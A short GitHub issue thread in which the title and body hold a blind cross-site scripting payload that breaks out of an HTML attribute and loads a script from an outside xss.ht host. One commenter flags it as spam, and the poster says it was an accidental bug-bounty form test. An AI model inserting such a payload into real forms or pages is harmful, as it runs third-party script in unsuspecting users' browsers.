### ISSUE TITLE
A problem:"><script src=https://h13120.xss.ht></script>

### ISSUE THREAD

**Issue by 985451** [bkeepers/github-notifications#167]
"><script src=https://h13120.xss.ht></script>

<table>
  <tr>
    <th>Browser</th>
    <td>Mozilla&#x2F;5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;67.0.3396.99 Safari&#x2F;537.36</td>
  </tr>
</table>

**Comment by jerone** [comment]
Spam and reported!

**Comment by 985451** [comment]
Sorry about that, didn't knew it would create a github issue on this page.
Was testing some forms for the bb program but this wasn't ment to end up in
a public repo!

Op di 7 aug. 2018 09:18 schreef Jeroen van Warmerdam <
notifications@github.com>:
